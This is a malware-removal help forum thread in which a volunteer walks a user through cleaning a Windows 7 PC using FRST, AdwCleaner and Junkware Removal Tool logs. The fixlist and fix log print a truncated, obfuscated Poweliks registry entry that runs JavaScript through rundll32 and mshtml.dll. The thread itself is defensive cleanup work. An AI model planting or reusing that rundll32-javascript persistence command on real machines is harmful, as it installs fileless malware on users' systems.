Task: {C29C119A-C76D-4616-AC43-7C28CD239D8A} - System32\Tasks\PCDEventLauncherTask => C:\Program Files\My Dell\sessionchecker.exe [2014-01-31] (PC-Doctor, Inc.)
Task: {C7B76AB8-4D13-4701-A99B-4CA0279A2533} - System32\Tasks\{68BD5DEF-AE9A-420D-8122-D60EB3894EE7} => C:\Security\cCleaner\CCleaner64.exe
Task: {C82BF3FE-92CF-4B06-A490-DA140838B54D} - System32\Tasks\GBM - New Backup Job-Incremental => C:\Program Files\Genie9\Genie Backup Manager\GBM.EXE [2012-06-04] (Genie9)
Task: {CD903411-568D-413C-A7D2-BD3D8D164C35} - System32\Tasks\{6F55B369-8B75-46DB-9049-1A3AE86A64F4} => C:\Security\cCleaner\CCleaner64.exe
Task: {D77626FE-7F65-4E7B-8C31-1C4884452045} - System32\Tasks\AdobeAAMUpdater-1.0-anonymous-PC-anonymous => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2012-09-20] (Adobe Systems Incorporated)
Task: {D9D526DC-E912-4EC2-924E-B3536822DA7B} - System32\Tasks\OfficeSoftwareProtectionPlatform\SvcRestartTask => Sc.exe start osppsvc
Task: {E014BA73-9877-4E43-BDAD-8AEF946D1F5C} - System32\Tasks\{D5D4FC32-E4BE-4061-B943-A2EEC9421BEE} => C:\Security\cCleaner\CCleaner64.exe
Task: {E19FA8D9-8402-47C1-A65C-694DC75F8406} - System32\Tasks\{BEE4D21A-3DA1-4660-94A2-B11FFD5286E1} => K:\LaCie Setup.exe
Task: {F5C581FF-ADC9-461C-8299-E937A9A1740F} - System32\Tasks\ISM-UpdateService-4e00205a-2ab1-4423-8f77-cc25b82cde1d-Logon => c:\Program Files (x86)\Intel\Intel® ME FW Recovery Agent\bin\Bootstrap.exe [2011-11-25] (Intel Corporation)
Task: {FF159092-D231-4085-8494-B7AAABA28727} - System32\Tasks\{3C7BA379-F2FA-427C-B3EB-0701A5E7CFF9} => K:\LaCie Setup.exe
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\GBM - New Backup Job-Full.job => C:\Program Files\Genie9\Genie Backup Manager\GBM.EXE
Task: C:\Windows\Tasks\GBM - New Backup Job-Incremental.job => C:\Program Files\Genie9\Genie Backup Manager\GBM.EXE
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\ISM-UpdateService-4e00205a-2ab1-4423-8f77-cc25b82cde1d-Logon.job => c:\Program Files (x86)\Intel\Intel® ME FW Recovery Agent\bin\Bootstrap.exe
Task: C:\Windows\Tasks\ISM-UpdateService-4e00205a-2ab1-4423-8f77-cc25b82cde1d.job => c:\Program Files (x86)\Intel\Intel® ME FW Recovery Agent\bin\Bootstrap.exe

==================== Loaded Modules (whitelisted) =============

2012-05-21 02:17 - 2012-05-21 02:17 - 00261632 ____N () C:\Program Files\Genie9\Genie Backup Manager\GSLogging.dll
2012-05-21 02:19 - 2012-05-21 02:19 - 00250368 ____N () C:\Program Files\Genie9\Genie Backup Manager\gs_encryption.dll
2012-01-20 04:13 - 2012-01-20 04:13 - 00369152 ____N () C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLI.Aspect.CrossDisplay.Graphics.Dashboard.dll
2011-11-09 09:55 - 2011-11-09 09:55 - 00016384 ____N () c:\Program Files (x86)\ATI Technologies\ATI.ACE\Branding\Branding.dll
2012-06-28 07:44 - 2012-01-21 11:35 - 00128280 ____N () C:\Program Files (x86)\Intel\Intel® Management Engine Components\FWService\IntelMeFWService.exe
2012-06-28 07:50 - 2012-01-26 21:49 - 02751808 ____N () C:\Program Files (x86)\Dell DataSafe Local Backup\COMPONENTS\SCHEDULER\STSERVICE.EXE
2014-11-28 19:11 - 2014-11-28 19:11 - 00388208 ____N () C:\Security\Avast\ng\vbox\VBoxDDU.dll
2014-11-28 19:11 - 2014-11-28 19:11 - 05851328 ____N () C:\Security\Avast\ng\vbox\VBoxRT.dll
2014-12-30 17:14 - 2014-12-30 17:14 - 02908160 _____ () C:\Security\Avast\defs\14123001\algo.dll
2014-11-28 19:11 - 2014-11-28 19:11 - 04495336 ____N () C:\Security\Avast\ng\vbox\x86\VBoxRT-x86.dll
2015-01-02 15:43 - 2015-01-02 15:43 - 02909696 _____ () C:\Security\Avast\defs\15010201\algo.dll
2014-01-20 13:17 - 2014-01-20 13:17 - 00073544 ____N () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
2014-10-11 12:05 - 2014-10-11 12:05 - 01044776 ____N () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
2010-12-11 16:23 - 2010-12-11 16:23 - 00279904 ____N () C:\Program Files (x86)\Acronis\TrueImageHome\Common\resource.dll
2010-12-11 15:09 - 2010-12-11 15:09 - 00019808 ____N () C:\Program Files (x86)\Acronis\TrueImageHome\Common\thread_pool.dll
2010-12-11 15:10 - 2010-12-11 15:10 - 00028512 ____N () C:\Program Files (x86)\Acronis\TrueImageHome\Common\rpc_client.dll
2014-11-28 19:11 - 2014-11-28 19:11 - 38562088 ____N () C:\Security\Avast\libcef.dll
2014-10-17 02:26 - 2014-10-17 02:26 - 00172032 ____N () C:\Windows\assembly\NativeImages_v2.0.50727_32\IsdiInterop\92a1650dbe9fad5f46633b835420e1a8\IsdiInterop.ni.dll
2012-06-28 07:42 - 2011-11-29 20:00 - 00059392 ____N () C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IsdiInterop.dll
2012-06-28 07:44 - 2012-01-21 06:23 - 01198872 ____N () C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\ACE.dll

==================== Safe Mode (whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\GoToAssist => ""="Service"

==================== EXE Association (whitelisted) =============

(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)

HKU\S-1-5-21-3319101212-3949270613-1064135436-1001\Software\Classes\.exe:  =>  <===== ATTENTION!

==================== MSCONFIG/TASK MANAGER disabled items =========

(Currently there is no automatic fix for this section.)

MSCONFIG\Services: NAUpdate => 2

========================= Accounts: ==========================

Administrator (S-1-5-21-3319101212-3949270613-1064135436-500 - Administrator - Disabled)
anonymous (S-1-5-21-3319101212-3949270613-1064135436-1001 - Administrator - Enabled) => C:\Users\anonymous
Guest (S-1-5-21-3319101212-3949270613-1064135436-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-3319101212-3949270613-1064135436-1002 - Limited - Enabled)

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (01/02/2015 03:42:45 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: BtvStack.exe, version: 7.4.0.115, time stamp: 0x4efc32fa
Faulting module name: BtvStack.exe, version: 7.4.0.115, time stamp: 0x4efc32fa
Exception code: 0xc0000005
Fault offset: 0x000000000007c618
Faulting process id: 0xb28
Faulting application start time: 0xBtvStack.exe0
Faulting application path: BtvStack.exe1
Faulting module path: BtvStack.exe2
Report Id: BtvStack.exe3

Error: (01/02/2015 03:42:42 PM) (Source: Windows Search Service) (EventID: 7042) (User: )
Description: The Windows Search Service is being stopped because there is a problem with the indexer: The catalog is corrupt.


Details:
    The content index catalog is corrupt.  (HRESULT : 0xc0041801) (0xc0041801)

Error: (01/02/2015 03:42:42 PM) (Source: Windows Search Service) (EventID: 7010) (User: )
Description: The index cannot be initialized.


Details:
    The content index catalog is corrupt.  (HRESULT : 0xc0041801) (0xc0041801)

Error: (01/02/2015 03:42:42 PM) (Source: Windows Search Service) (EventID: 3058) (User: )
Description: The application cannot be initialized.

Context: Windows Application


Details:
    The content index catalog is corrupt.  (HRESULT : 0xc0041801) (0xc0041801)

Error: (01/02/2015 03:42:42 PM) (Source: Windows Search Service) (EventID: 3028) (User: )
Description: The gatherer object cannot be initialized.

Context: Windows Application, SystemIndex Catalog


Details:
    The content index catalog is corrupt.  (HRESULT : 0xc0041801) (0xc0041801)

Error: (01/02/2015 03:42:42 PM) (Source: Windows Search Service) (EventID: 3029) (User: )
Description: The plug-in in <Search.TripoliIndexer> cannot be initialized.

Context: Windows Application, SystemIndex Catalog


Details:
    Element not found.  (HRESULT : 0x80070490) (0x80070490)

Error: (01/02/2015 03:42:37 PM) (Source: Windows Search Service) (EventID: 3029) (User: )
Description: The plug-in in <Search.JetPropStore> cannot be initialized.

Context: Windows Application, SystemIndex Catalog


Details:
    The content index catalog is corrupt.  (HRESULT : 0xc0041801) (0xc0041801)

Error: (01/02/2015 03:42:37 PM) (Source: Windows Search Service) (EventID: 9002) (User: )
Description: The Windows Search Service cannot load the property store information.

Context: Windows Application, SystemIndex Catalog


Details:
    The content index server cannot update or access information because of a database error.  Stop and restart the search service.  If the problem persists, reset and recrawl the content index.  In some cases it may be necessary to delete and recreate the content index.  (HRESULT : 0x8004117f) (0x8004117f)

Error: (01/02/2015 03:42:37 PM) (Source: Windows Search Service) (EventID: 7040) (User: )
Description: The search service has detected corrupted data files in the index {id=1100}. The service will attempt to automatically correct this problem by rebuilding the index.


Details:
    The content index catalog is corrupt.  (HRESULT : 0xc0041801) (0xc0041801)

Error: (01/02/2015 03:42:37 PM) (Source: Windows Search Service) (EventID: 9000) (User: )
Description: The Windows Search Service cannot open the Jet property store.


Details:
    0x%08x (0x8004117f - The content index server cannot update or access information because of a database error.  Stop and restart the search service.  If the problem persists, reset and recrawl the content index.  In some cases it may be necessary to delete and recreate the content index.  (HRESULT : 0x8004117f))


System errors:
=============
Error: (01/02/2015 03:44:26 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The Dell Digital Delivery Service service terminated unexpectedly.  It has done this 1 time(s).

Error: (01/02/2015 03:42:42 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Windows Search service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 30000 milliseconds: Restart the service.

Error: (01/02/2015 03:42:42 PM) (Source: Service Control Manager) (EventID: 7024) (User: )
Description: The Windows Search service terminated with service-specific error %%-1073473535.

Error: (01/02/2015 03:42:10 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (01/02/2015 03:42:09 PM) (Source: Microsoft-Windows-BitLocker-Driver) (EventID: 24620) (User: NT AUTHORITY)
Description: Encrypted volume check: Volume information on  cannot be read.

Error: (01/02/2015 03:42:02 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Garmin Core Update Service service failed to start due to the following error:
%%1053

Error: (01/02/2015 03:42:02 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Garmin Core Update Service service to connect.

Error: (12/30/2014 05:18:08 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (12/30/2014 05:17:41 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Network List Service service depends on the Network Location Awareness service which failed to start because of the following error:
%%1068

Error: (12/30/2014 05:17:41 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Network List Service service depends on the Network Location Awareness service which failed to start because of the following error:
%%1068


Microsoft Office Sessions:
=========================
Error: (01/02/2015 03:42:45 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: BtvStack.exe7.4.0.1154efc32faBtvStack.exe7.4.0.1154efc32fac0000005000000000007c618b2801d026cc8015382aC:\Program Files (x86)\Dell Wireless\Bluetooth Suite\BtvStack.exeC:\Program Files (x86)\Dell Wireless\Bluetooth Suite\BtvStack.exee72ff7d1-92bf-11e4-97f2-e006e62fa10a

Error: (01/02/2015 03:42:42 PM) (Source: Windows Search Service) (EventID: 7042) (User: )
Description:
Details:
    The content index catalog is corrupt.  (HRESULT : 0xc0041801) (0xc0041801)
The catalog is corrupt

Error: (01/02/2015 03:42:42 PM) (Source: Windows Search Service) (EventID: 7010) (User: )
Description:
Details:
    The content index catalog is corrupt.  (HRESULT : 0xc0041801) (0xc0041801)

Error: (01/02/2015 03:42:42 PM) (Source: Windows Search Service) (EventID: 3058) (User: )
Description: Context: Windows Application


Details:
    The content index catalog is corrupt.  (HRESULT : 0xc0041801) (0xc0041801)

Error: (01/02/2015 03:42:42 PM) (Source: Windows Search Service) (EventID: 3028) (User: )
Description: Context: Windows Application, SystemIndex Catalog


Details:
    The content index catalog is corrupt.  (HRESULT : 0xc0041801) (0xc0041801)

Error: (01/02/2015 03:42:42 PM) (Source: Windows Search Service) (EventID: 3029) (User: )
Description: Context: Windows Application, SystemIndex Catalog


Details:
    Element not found.  (HRESULT : 0x80070490) (0x80070490)
Search.TripoliIndexer

Error: (01/02/2015 03:42:37 PM) (Source: Windows Search Service) (EventID: 3029) (User: )
Description: Context: Windows Application, SystemIndex Catalog


Details:
    The content index catalog is corrupt.  (HRESULT : 0xc0041801) (0xc0041801)
Search.JetPropStore

Error: (01/02/2015 03:42:37 PM) (Source: Windows Search Service) (EventID: 9002) (User: )
Description: Context: Windows Application, SystemIndex Catalog


Details:
    The content index server cannot update or access information because of a database error.  Stop and restart the search service.  If the problem persists, reset and recrawl the content index.  In some cases it may be necessary to delete and recreate the content index.  (HRESULT : 0x8004117f) (0x8004117f)

Error: (01/02/2015 03:42:37 PM) (Source: Windows Search Service) (EventID: 7040) (User: )
Description:
Details:
    The content index catalog is corrupt.  (HRESULT : 0xc0041801) (0xc0041801)
1100

Error: (01/02/2015 03:42:37 PM) (Source: Windows Search Service) (EventID: 9000) (User: )
Description:
Details:
    0x%08x (0x8004117f - The content index server cannot update or access information because of a database error.  Stop and restart the search service.  If the problem persists, reset and recrawl the content index.  In some cases it may be necessary to delete and recreate the content index.  (HRESULT : 0x8004117f))


==================== Memory info ===========================

Processor: Intel® Core™ i7-3770 CPU @ 3.40GHz
Percentage of memory in use: 52%
Total physical RAM: 12248.9 MB
Available physical RAM: 5854.68 MB
Total Pagefile: 24495.98 MB
Available Pagefile: 16888.28 MB
Total Virtual: 8192 MB
Available Virtual: 8191.81 MB

==================== Drives ================================

Drive c: (OS) (Fixed) (Total:1850.72 GB) (Free:1515.79 GB) NTFS
Drive j: (LaCie) (Fixed) (Total:1863.01 GB) (Free:709.15 GB) NTFS
Drive l: () (Removable) (Total:14.9 GB) (Free:11.38 GB) FAT32

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 1863 GB) (Disk ID: A97102A7)
Partition 1: (Not Active) - (Size=39 MB) - (Type=DE)
Partition 2: (Active) - (Size=12.3 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=1850.7 GB) - (Type=07 NTFS)

========================================================
Disk: 1 (MBR Code: Windows XP) (Size: 1863 GB) (Disk ID: FC02E086)
Partition 1: (Not Active) - (Size=1863 GB) - (Type=07 NTFS)

========================================================
Disk: 6 (Size: 14.9 GB) (Disk ID: 431EBE56)
Partition 1: (Not Active) - (Size=14.9 GB) - (Type=0C)

==================== End Of Log ============================

 

 

 

 

 



#7 Oh My!

Oh My!

    Adware and Spyware and Malware.....


  • Malware Response Instructor
  • 38,196 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:California
  • Local time:08:28 AM

Posted 02 January 2015 - 04:17 PM

Greetings,

Thanks for the information. While I review it please complete the below then see if you can attach the file.

===================================================

Managing Attachments

----------
  • Navigate to the top of this post
  • In the upper right hand corner you will see your screen name
  • Left click on that and a drop down list will appear
  • Select My Settings
  • On the left hand side under General Settings click on Manage Attachments
  • To the very right on the blue bar just above the first entry click on the open check box
  • All of the checkboxes should now be checked
  • Click Delete Selected
  • Your should now see You have used 0bytes of 250K

Edited by Oh My!, 02 January 2015 - 04:35 PM.

Gary
 
If I do not reply within 24 hours please send me a Personal Message.

"For unto us a Child is born, Unto us a Son is given;"

#8 Oh My!

Oh My!

    Adware and Spyware and Malware.....


  • Malware Response Instructor
  • 38,196 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:California
  • Local time:08:28 AM

Posted 02 January 2015 - 04:40 PM

Thanks for your patience. Please be sure to see my previous post regarding how to manage Attachments.

I have a step for you to take but I must first advise you of the following.

===================================================

BACKDOOR WARNING!

--------------------

One or more of the identified infections is a Backdoor Trojan.

This allows hackers to remotely control your computer, steal critical system information and download and execute files.

I would counsel you to disconnect this PC from the Internet immediately. If you do any banking or other financial transactions on the PC or if it should contain any other sensitive information, please get to a known clean computer and change all passwords where applicable. Please let me know if you have already noticed evidences of financial institution irregularities. Those accounts should be monitored from this point forward.

Though the trojan has been identified and can be killed, because of it's backdoor functionality, your PC is very likely compromised and there is no way to be sure your computer can ever again be trusted. Many experts in the security community believe that once infected with this type of trojan, the best course of action would be a reformat and reinstall of the OS. Please read these for more information:

How Do I Handle Possible Identify Theft, Internet Fraud and CC Fraud?
When Should I Format, How Should I Reinstall
 

Here are some thoughts I have put together for people who ask what they should do in light of the infection. Ultimately each user must decide for themselves what to do and the below are things you might want to consider.

It is necessary for us to at least make you aware of the worse case scenario. This is because of the potential Backdoor Trojans bring with them, but it is not a determination on our part that your situation currently falls within this worse case scenario.

Ultimately it is a personal decision whether to reformat or not. What decision should you make to let you sleep well at night? It is different for different people. I will say whether rightly or wrongly most people decide to clean and not reformat, at least initially.

The only insight I can offer is how I evaluate the issue personally even though I have never had a Backdoor Trojan on my computer. One of the primary purposes for malicious software is to somehow separate you from your money. It seems reasonable to assume that a thief trying to take your money via a Backdoor Trojan will hit you hard, and quickly. Once your computer starts to act up and you become suspicious you have the opportunity to eliminate access to your computer and change the information taken, namely account and password information. The key to this, in my opinion, is whether or not you have noticed any irregularities in your banking or other financial institutions, or things like email and social network accounts (i.e. Facebook). If you have not seen any evidence of that then you may question whether your information has truly been stolen. If it seems it hasn't, and your critical information has been changed, it is reasonable to be more confident you are safe but you must stop short of claiming an absolute guarantee.

If, after careful consideration you decide not to reformat your computer it would be wise to continue monitoring your sensitive data and don't wait to address future symptoms on your computer which seem to be malware related.

The bottom line, the only way to be absolutely sure to be rid of a Backdoor Trojan is to reformat. The decision is yours.

Oh My!


We can still clean this machine but I can't guarantee that it will be 100% secure afterwards. Let me know what you decide to do. If you decide to go through with the cleanup, please proceed with the following steps.

===================================================

Farbar's Recovery Scan Tool - Run Fix in Normal or Safe Mode

--------------------
  • Press the Windows key Windows_Logo_key.gif + r on your keyboard at the same time. Type in notepad and press Enter
  • Please copy and paste the contents of the below code box into the open notepad and save it to your desktop (<<<Important) as fixlist.txt
HKU\S-1-5-21-3319101212-3949270613-1064135436-1001\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf> (the data entry has 243 more characters). <==== Poweliks!
CustomCLSID: HKU\S-1-5-21-3319101212-3949270613-1064135436-1001_Classes\CLSID\{4F8A6B95-6220-40e1-BAF6-4F2810B32428}\InprocServer32 -> C:\Audiovisual & Graphics\Thumbs Plus 8 SP1\Bin\cswshlex64.dll No File
CustomCLSID: HKU\S-1-5-21-3319101212-3949270613-1064135436-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf> (the data entry has 251 more characters). <==== Poweliks?
HKU\S-1-5-21-3319101212-3949270613-1064135436-1001\Software\Classes\.exe:  =>  <===== ATTENTION!
  • Launch FRST and press the Fix button just once and wait, the program will automatically launch fixlist.txt.
  • The tool will create a log on the desktop called Fixlog.txt. Please copy and paste the contents of the file in your reply.
===================================================

AdwCleaner by Xplode - Delete Adware

-------------------
  • Please download AdwCleaner by Xplode onto your desktop.
  • Close all open programs and internet browser
  • Double click on AdwCleaner.exe, click Run, then select I agree if it appears
  • Click Scan
  • Once the scan has completed you will see Pending. Please uncheck elements youdon't want to remove above the progress bar
  • Click on Clean
  • Confirm the cleaning and rebooting of your computer by clicking OK
  • Your computer will be rebooted automatically. A text file will open after the restart
  • Copy and paste the contents in your reply
  • You can also find the logfile at C:\AdwCleaner\AdwCleaner.txt
===================================================

Junkware Removal Tool by thisisu

-------------------
  • Please download Junkware Removal Tool and save it to your desktop.
  • Disable your AntiVirus and AntiSpyware applications, usually via a right click on the System Tray icon. They may otherwise interfere with our tools. (Click on this link to see a list of programs that should be disabled. The list is not all inclusive.)
  • Right-mouse click JRT.exe and select Run as administrator (Windows XP double click the icon)
  • Please allow the program time to run
  • Once completed a Notepad document will open on your desktop
  • Copy and paste the contents in your reply
===================================================

Things I would like to see in your next reply. Please be sure to copy and paste any requested log information unless you are asked to attach it. :thumbsup2:
  • Fixlog
  • AdwCleaner log
  • Junkware log

Gary
 
If I do not reply within 24 hours please send me a Personal Message.

"For unto us a Child is born, Unto us a Son is given;"

#9 baabel

baabel
  • Topic Starter

  • Members
  • 142 posts
  • OFFLINE
  •  
  • Local time:12:28 PM

Posted 02 January 2015 - 05:13 PM

Attachments are cleared.

 

I now attach "Summary".

 

I choose to clean the computer and change the sensitive passwords.

 

All my communications with you have been on an old computer I use as a secondary.  While I was sending the logs to you a little while back the infected machine failed and rebooted again.  Most of the time the machine has failed & rebooted and is waiting for me to log in.  I have now unplugged it from the Internet.

 

I will now begin the steps you have given me.



#10 baabel

baabel
  • Topic Starter

  • Members
  • 142 posts
  • OFFLINE
  •  
  • Local time:12:28 PM

Posted 02 January 2015 - 05:53 PM

Here are the logs:

 

 

 

# AdwCleaner v4.106 - Report created 02/01/2015 at 17:27:19
# Updated 21/12/2014 by Xplode
# Database : 2015-01-01.1 [Live]
# Operating System : Windows 7 Home Premium Service Pack 1 (64 bits)
# Username : anonymous - ANONYMOUS-PC
# Running from : C:\Users\anonymous\Desktop\AdwCleaner.exe
# Option : Clean

***** [ Services ] *****


***** [ Files / Folders ] *****

Folder Deleted : C:\ProgramData\Yahoo! Companion

***** [ Scheduled Tasks ] *****


***** [ Shortcuts ] *****


***** [ Registry ] *****

Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{81017EA9-9AA8-4A6A-9734-7AF40E7D593F}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{D2CE3E00-F94A-4740-988E-03DC2F38C34F}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{8DCB7100-DF86-4384-8842-8FA844297B3F}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{D2CE3E00-F94A-4740-988E-03DC2F38C34F}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{D2CE3E00-F94A-4740-988E-03DC2F38C34F}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{8DCB7100-DF86-4384-8842-8FA844297B3F}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{D2CE3E00-F94A-4740-988E-03DC2F38C34F}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{8DCB7100-DF86-4384-8842-8FA844297B3F}
Value Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\Toolbar [{8DCB7100-DF86-4384-8842-8FA844297B3F}]
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Yahoo! Toolbar
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Yahoo! Companion

***** [ Browsers ] *****

-\\ Internet Explorer v11.0.9600.17496


-\\ Mozilla Firefox v31.0 (x86 en-US)


*************************

AdwCleaner[R0].txt - [4171 octets] - [06/12/2014 14:30:51]
AdwCleaner[R1].txt - [890 octets] - [06/12/2014 14:34:31]
AdwCleaner[R2].txt - [2082 octets] - [02/01/2015 17:26:05]
AdwCleaner[S0].txt - [4200 octets] - [06/12/2014 14:32:27]
AdwCleaner[S1].txt - [2027 octets] - [02/01/2015 17:27:19]

########## EOF - C:\AdwCleaner\AdwCleaner[S1].txt - [2087 octets] ##########
 

 

 

 

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 02-01-2015
Ran by anonymous at 2015-01-02 17:21:31 Run:1
Running from C:\Users\anonymous\Desktop
Loaded Profile: anonymous (Available profiles: anonymous)
Boot Mode: Normal
==============================================

Content of fixlist:
*****************
HKU\S-1-5-21-3319101212-3949270613-1064135436-1001\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf> (the data entry has 243 more characters). <==== Poweliks!
CustomCLSID: HKU\S-1-5-21-3319101212-3949270613-1064135436-1001_Classes\CLSID\{4F8A6B95-6220-40e1-BAF6-4F2810B32428}\InprocServer32 -> C:\Audiovisual & Graphics\Thumbs Plus 8 SP1\Bin\cswshlex64.dll No File
CustomCLSID: HKU\S-1-5-21-3319101212-3949270613-1064135436-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf> (the data entry has 251 more characters). <==== Poweliks?
HKU\S-1-5-21-3319101212-3949270613-1064135436-1001\Software\Classes\.exe:  =>  <===== ATTENTION!
*****************

"HKU\S-1-5-21-3319101212-3949270613-1064135436-1001\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32" => Key Deleted Successfully.
"HKU\S-1-5-21-3319101212-3949270613-1064135436-1001\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key deleted successfully.
"HKU\S-1-5-21-3319101212-3949270613-1064135436-1001_Classes\CLSID\{4F8A6B95-6220-40e1-BAF6-4F2810B32428}" => Key deleted successfully.
HKU\S-1-5-21-3319101212-3949270613-1064135436-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5} => Key not found.
"HKU\S-1-5-21-3319101212-3949270613-1064135436-1001\Software\Classes\.exe" => Key deleted successfully.

==== End of Fixlog 17:21:31 ====

 

 

 

 

 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Thisisu
Version: 6.4.1 (12.28.2014:1)
OS: Windows 7 Home Premium x64
Ran by anonymous on Fri 01/02/2015 at 17:42:02.02
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




~~~ Services



~~~ Registry Values



~~~ Registry Keys



~~~ Files



~~~ Folders

Successfully deleted: [Folder] "C:\ProgramData\pcdr"
Successfully deleted: [Folder] "C:\Users\anonymous\AppData\Roaming\pcdr"
Successfully deleted: [Empty Folder] C:\Users\anonymous\appdata\local\{060BC2F8-7380-417E-9E1A-11DAE8A2C08F}
Successfully deleted: [Empty Folder] C:\Users\anonymous\appdata\local\{13359790-78D6-43FA-9A8C-4957DD34740F}
Successfully deleted: [Empty Folder] C:\Users\anonymous\appdata\local\{21448678-1388-4EAF-90AA-B7AAF90BD80B}
Successfully deleted: [Empty Folder] C:\Users\anonymous\appdata\local\{4193A6EB-C587-4EFA-B5BD-A4A92CB87609}
Successfully deleted: [Empty Folder] C:\Users\anonymous\appdata\local\{57EC87D1-89AE-4B8C-9F53-961287DB75E6}



~~~ Event Viewer Logs were cleared





~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on Fri 01/02/2015 at 17:44:50.66
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 

 

 

 

 

 

 



#11 Oh My!

Oh My!

    Adware and Spyware and Malware.....


  • Malware Response Instructor
  • 38,196 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:California
  • Local time:08:28 AM

Posted 02 January 2015 - 07:01 PM

Very good. Please update me on how your computer is running now.
Gary
 
If I do not reply within 24 hours please send me a Personal Message.

"For unto us a Child is born, Unto us a Son is given;"

#12 baabel

baabel
  • Topic Starter

  • Members
  • 142 posts
  • OFFLINE
  •  
  • Local time:12:28 PM

Posted 03 January 2015 - 10:32 AM

My computer is working beautifully!  I will use it for a little while longer before running off to work.

 

I have some questions.

 

(1) I obviously want to do everything I can to prevent this from happening again.  It only takes one major computer crisis to show how much I depend on my primary computer.  Obviously Avast Free plus occasionally running SpyBot & Malwarebytes Free is not enough to protect myself.  What should I do next.  The Pay version of Avast?  Something else?

 

(2) I noticed in the cleaning logs we made that a program called "Thumbs Plus" cropped up more than once.  Thumbs Plus is an old photo managing program I used in the XP days and I believe even in the Windows 98 days.  I appear to still have a copy of it on my external drive.  It is in an uncompressed folder where I simply moved folders from my last primary XP computer to this external drive.  The external drive is now hooked up to my primary W7 computer.  I use the external for backups.  I don't even know if this ancient program would work in the W7 environment but among other files, the folder contains the Thumbs Plus exe.  Do you think Thumbs Plus may have enabled the attack?  Should I erase the folder it is in?

 

Any comments & suggestions that you have would be most welcome & appreciated.



#13 Oh My!

Oh My!

    Adware and Spyware and Malware.....


  • Malware Response Instructor
  • 38,196 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:California
  • Local time:08:28 AM

